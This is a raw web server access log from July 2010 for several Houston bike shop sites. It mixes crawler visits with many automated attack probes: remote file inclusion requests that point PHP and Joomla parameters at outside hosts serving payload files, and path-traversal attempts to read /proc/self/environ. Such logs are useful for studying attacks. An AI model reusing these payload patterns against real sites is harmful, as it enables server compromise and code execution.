188.120.32.164 - - [10/Jul/2010:00:16:08 -0700] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_cart.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.120.32.164 - - [10/Jul/2010:00:16:08 -0700] "GET /logs/access.log///skin_shop/standard/3_plugin_twindow/twindow_cart.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
89.108.64.192 - - [10/Jul/2010:00:16:20 -0700] "GET /bbs//////////good.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
67.195.114.243 - - [10/Jul/2010:00:19:58 -0700] "GET /tmp/ HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.houstonbikeshop.com"
87.250.252.242 - - [10/Jul/2010:00:21:09 -0700] "GET /translations/Turkish.txt HTTP/1.1" 200 32818 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
89.108.64.192 - - [10/Jul/2010:00:26:17 -0700] "GET /logs/access.log//bbs//////////good.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
89.108.64.192 - - [10/Jul/2010:00:26:17 -0700] "GET /bbs//////////good.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
89.108.64.192 - - [10/Jul/2010:00:26:18 -0700] "GET /logs//bbs//////////good.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
89.108.64.192 - - [10/Jul/2010:00:45:42 -0700] "GET /logs//bbs//////////good.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
89.108.64.192 - - [10/Jul/2010:00:45:42 -0700] "GET /bbs//////////good.php?board_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
209.40.100.50 - - [10/Jul/2010:00:49:15 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
209.40.100.50 - - [10/Jul/2010:00:49:15 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
81.21.78.22 - - [10/Jul/2010:00:49:30 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.highweald.org/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
81.21.78.22 - - [10/Jul/2010:00:49:30 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.highweald.org/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
64.207.204.37 - - [10/Jul/2010:00:51:57 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.highweald.org/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
64.207.204.37 - - [10/Jul/2010:00:51:58 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.highweald.org/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
188.72.250.201 - - [10/Jul/2010:00:54:58 -0700] "GET /logs/access.log HTTP/1.1" 200 53211 "http://www.svbikes.com/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.svbikes.com"
209.40.100.50 - - [10/Jul/2010:01:01:02 -0700] "GET /skin/zero_vote/error.php?dir=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
64.207.204.37 - - [10/Jul/2010:01:01:11 -0700] "GET /skin/zero_vote/error.php?dir=http://www.gimlegutta.com/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
81.21.78.22 - - [10/Jul/2010:01:01:29 -0700] "GET /skin/zero_vote/error.php?dir=http://www.gimlegutta.com/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
87.250.252.242 - - [10/Jul/2010:01:01:48 -0700] "GET /tmp/mailError.log HTTP/1.1" 200 4160 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
209.40.100.50 - - [10/Jul/2010:01:03:14 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
209.40.100.50 - - [10/Jul/2010:01:03:14 -0700] "GET /skin/zero_vote/error.php?dir=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
209.40.100.50 - - [10/Jul/2010:01:04:12 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "svbikes.com"
209.40.100.50 - - [10/Jul/2010:01:04:12 -0700] "GET /skin/zero_vote/error.php?dir=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "svbikes.com"
81.21.78.22 - - [10/Jul/2010:01:05:16 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.gimlegutta.com/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
81.21.78.22 - - [10/Jul/2010:01:05:16 -0700] "GET /skin/zero_vote/error.php?dir=http://www.gimlegutta.com/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
81.21.78.22 - - [10/Jul/2010:01:08:27 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.gimlegutta.com/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "svbikes.com"
81.21.78.22 - - [10/Jul/2010:01:08:27 -0700] "GET /skin/zero_vote/error.php?dir=http://www.gimlegutta.com/logs/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "svbikes.com"
209.40.100.50 - - [10/Jul/2010:01:27:41 -0700] "GET /logs/?sourcedir=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 200 2940 "-" "libwww-perl/5.808" "houstonbikeshop.com"
209.40.100.50 - - [10/Jul/2010:01:27:41 -0700] "GET /?sourcedir=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 200 1764 "-" "libwww-perl/5.808" "houstonbikeshop.com"
62.44.82.61 - - [10/Jul/2010:01:28:12 -0700] "GET /index.php.php?option=com_myblog&Itemid=63&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.44.82.61 - - [10/Jul/2010:01:28:23 -0700] "GET /index2.php?option=com_myblog&Itemid=63&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.44.82.61 - - [10/Jul/2010:01:28:29 -0700] "GET /*.php?option=com_myblog&Itemid=63&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.44.82.61 - - [10/Jul/2010:01:28:42 -0700] "GET /index.php?option=com_myblog&Itemid=63&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
62.44.82.61 - - [10/Jul/2010:01:28:51 -0700] "GET /?option=com_myblog&Itemid=63&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1764 "-" "libwww-perl/5.803" "houstonbikeshop.com"
87.250.252.242 - - [10/Jul/2010:01:45:19 -0700] "GET /translations/Galician.txt HTTP/1.1" 200 33430 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
67.195.115.87 - - [10/Jul/2010:01:48:38 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
67.195.115.87 - - [10/Jul/2010:01:48:40 -0700] "GET /bullitinboard/viewtopic.php?p=12130 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
89.108.64.192 - - [10/Jul/2010:02:10:08 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
89.108.64.192 - - [10/Jul/2010:02:10:08 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
89.108.64.192 - - [10/Jul/2010:02:10:08 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
89.108.64.192 - - [10/Jul/2010:02:11:46 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
87.250.252.242 - - [10/Jul/2010:02:27:27 -0700] "GET /logs/access_100610.log HTTP/1.1" 200 65536 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
220.227.52.98 - - [10/Jul/2010:02:36:42 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.227.52.98 - - [10/Jul/2010:02:36:42 -0700] "GET /logs/access.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.227.52.98 - - [10/Jul/2010:02:36:42 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.249.65.56 - - [10/Jul/2010:02:44:37 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.svbikes.com"
66.249.65.35 - - [10/Jul/2010:02:44:37 -0700] "GET /index.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.svbikes.com"
89.108.64.192 - - [10/Jul/2010:02:51:58 -0700] "GET /logs/access_091110.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "bicyclestoreshouston.com"
89.108.64.192 - - [10/Jul/2010:02:51:58 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "bicyclestoreshouston.com"
89.108.64.192 - - [10/Jul/2010:02:51:59 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "bicyclestoreshouston.com"
208.92.234.103 - - [10/Jul/2010:02:59:05 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://chatelleconcept.com/images/ID-RFI.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.79" "www.svbikes.com"
87.250.252.242 - - [10/Jul/2010:03:08:16 -0700] "GET /bullitinboard/ HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
209.40.100.50 - - [10/Jul/2010:03:22:33 -0700] "GET /logs/access_100510.log//?include_dir=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.svbikes.com"
209.40.100.50 - - [10/Jul/2010:03:22:33 -0700] "GET /?include_dir=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 200 1764 "-" "libwww-perl/5.808" "www.svbikes.com"
209.40.100.50 - - [10/Jul/2010:03:22:33 -0700] "GET /logs//?include_dir=http://mountaincabinforrent.com/images/banners/e107/e107/id.txt? HTTP/1.1" 200 2945 "-" "libwww-perl/5.808" "www.svbikes.com"
209.116.59.107 - - [10/Jul/2010:03:30:07 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.116.59.107 - - [10/Jul/2010:03:30:07 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.116.59.107 - - [10/Jul/2010:03:30:08 -0700] "GET /logs/access.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.111.80.213 - - [10/Jul/2010:03:38:30 -0700] "GET /bbs////////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.svbikes.com"
78.111.80.213 - - [10/Jul/2010:03:38:30 -0700] "GET /logs/access_100510.log//bbs////////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.svbikes.com"
78.111.80.213 - - [10/Jul/2010:03:38:30 -0700] "GET /logs//bbs////////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.svbikes.com"
78.111.80.213 - - [10/Jul/2010:03:40:40 -0700] "GET /logs/access.log//bbs////////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
78.111.80.213 - - [10/Jul/2010:03:40:40 -0700] "GET /bbs////////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
78.111.80.213 - - [10/Jul/2010:03:40:40 -0700] "GET /logs//bbs////////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
78.111.80.213 - - [10/Jul/2010:03:42:08 -0700] "GET /bbs////////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
209.116.59.107 - - [10/Jul/2010:03:42:29 -0700] "GET /index.php?option=com_search&sstring=&mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.116.59.107 - - [10/Jul/2010:03:42:30 -0700] "GET /logs//index.php?option=com_search&sstring=&mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.116.59.107 - - [10/Jul/2010:03:42:30 -0700] "GET /logs/access.log%20%20//index.php?option=com_search&sstring=&mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.111.80.213 - - [10/Jul/2010:03:43:06 -0700] "GET /logs//bbs////////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
78.111.80.213 - - [10/Jul/2010:03:43:06 -0700] "GET /logs/access.log//bbs////////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
209.116.59.107 - - [10/Jul/2010:03:44:33 -0700] "GET /index.php?option=com_search&sstring=&mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.116.59.107 - - [10/Jul/2010:03:44:33 -0700] "GET /logs//index.php?option=com_search&sstring=&mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.116.59.107 - - [10/Jul/2010:03:44:53 -0700] "GET /logs/access.log//index.php?option=com_search&sstring=&mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.250.252.242 - - [10/Jul/2010:03:48:31 -0700] "GET /Bikes.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
78.111.80.213 - - [10/Jul/2010:04:00:22 -0700] "GET /logs//bbs////////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
78.111.80.213 - - [10/Jul/2010:04:00:22 -0700] "GET /logs/access.log%20%20//bbs////////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
78.111.80.213 - - [10/Jul/2010:04:00:22 -0700] "GET /bbs////////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
94.136.207.194 - - [10/Jul/2010:04:05:11 -0700] "GET /logs/access.log HTTP/1.0" 200 66675 "http://houstonbikeshop.com/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "houstonbikeshop.com"
209.116.59.107 - - [10/Jul/2010:04:05:22 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.116.59.107 - - [10/Jul/2010:04:05:22 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.116.59.107 - - [10/Jul/2010:04:05:23 -0700] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.200 - - [10/Jul/2010:04:10:33 -0700] "GET /logs/access_100510.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://recky.webs.com/autoid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
77.79.246.200 - - [10/Jul/2010:04:10:33 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://recky.webs.com/autoid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
77.79.246.200 - - [10/Jul/2010:04:10:33 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://recky.webs.com/autoid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
77.79.246.200 - - [10/Jul/2010:04:11:41 -0700] "GET /logs/access_100510.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://recky.webs.com/autoid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
77.79.246.200 - - [10/Jul/2010:04:11:41 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://recky.webs.com/autoid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
77.79.246.200 - - [10/Jul/2010:04:11:41 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://recky.webs.com/autoid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
67.148.93.62 - - [10/Jul/2010:04:17:38 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://kriezz90.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
67.148.93.62 - - [10/Jul/2010:04:17:44 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://kriezz90.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
209.116.59.107 - - [10/Jul/2010:04:31:09 -0700] "GET /logs/access_100510.log////skin/ggambo7002_board/comment_modify.php?dir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
209.116.59.107 - - [10/Jul/2010:04:31:09 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
209.116.59.107 - - [10/Jul/2010:04:31:09 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
87.250.252.242 - - [10/Jul/2010:04:32:40 -0700] "GET /fit.html HTTP/1.1" 200 17443 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
209.116.59.107 - - [10/Jul/2010:04:34:44 -0700] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.112.217 - - [10/Jul/2010:04:43:49 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.112.217 - - [10/Jul/2010:04:43:51 -0700] "GET /bullitinboard/viewtopic.php?p=15513 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
213.180.89.92 - - [10/Jul/2010:05:12:29 -0700] "GET /logs/access_100510.log//index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.svbikes.com"
213.180.89.92 - - [10/Jul/2010:05:12:30 -0700] "GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.svbikes.com"
213.180.89.92 - - [10/Jul/2010:05:12:30 -0700] "GET /logs//index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.svbikes.com"
117.53.96.161 - - [10/Jul/2010:05:14:51 -0700] "HEAD / HTTP/1.0" 200 0 "http://svbikes.com" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "svbikes.com"
213.180.89.92 - - [10/Jul/2010:05:15:39 -0700] "GET /logs//index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.svbikes.com"
213.180.89.92 - - [10/Jul/2010:05:15:40 -0700] "GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.svbikes.com"
38.111.147.83 - - [10/Jul/2010:05:22:22 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "bicyclestoreshouston.com"
87.250.252.242 - - [10/Jul/2010:05:31:12 -0700] "GET /translations/Finnish.txt HTTP/1.1" 200 32278 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
38.111.147.83 - - [10/Jul/2010:05:36:02 -0700] "GET /bullitinboard/viewtopic.php?p=13319 HTTP/1.0" 200 517 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "bicyclestoreshouston.com"
67.195.37.172 - - [10/Jul/2010:05:36:04 -0700] "GET /bullitinboard/viewtopic.php?p=14714 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
38.111.147.83 - - [10/Jul/2010:05:36:31 -0700] "GET /cms/ HTTP/1.0" 404 - "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "bicyclestoreshouston.com"
174.138.163.178 - - [10/Jul/2010:05:57:22 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.138.163.178 - - [10/Jul/2010:05:57:22 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.138.163.178 - - [10/Jul/2010:05:57:22 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.56.49 - - [10/Jul/2010:05:59:21 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://star.ee.nchu.edu.tw/cpsub/data/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.56.49 - - [10/Jul/2010:05:59:21 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://star.ee.nchu.edu.tw/cpsub/data/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.56.49 - - [10/Jul/2010:05:59:21 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://star.ee.nchu.edu.tw/cpsub/data/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
121.1.130.140 - - [10/Jul/2010:06:02:13 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://star.ee.nchu.edu.tw/cpsub/data/v4.5id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
194.109.22.110 - - [10/Jul/2010:06:02:16 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
194.109.22.110 - - [10/Jul/2010:06:02:16 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
194.109.22.110 - - [10/Jul/2010:06:02:16 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
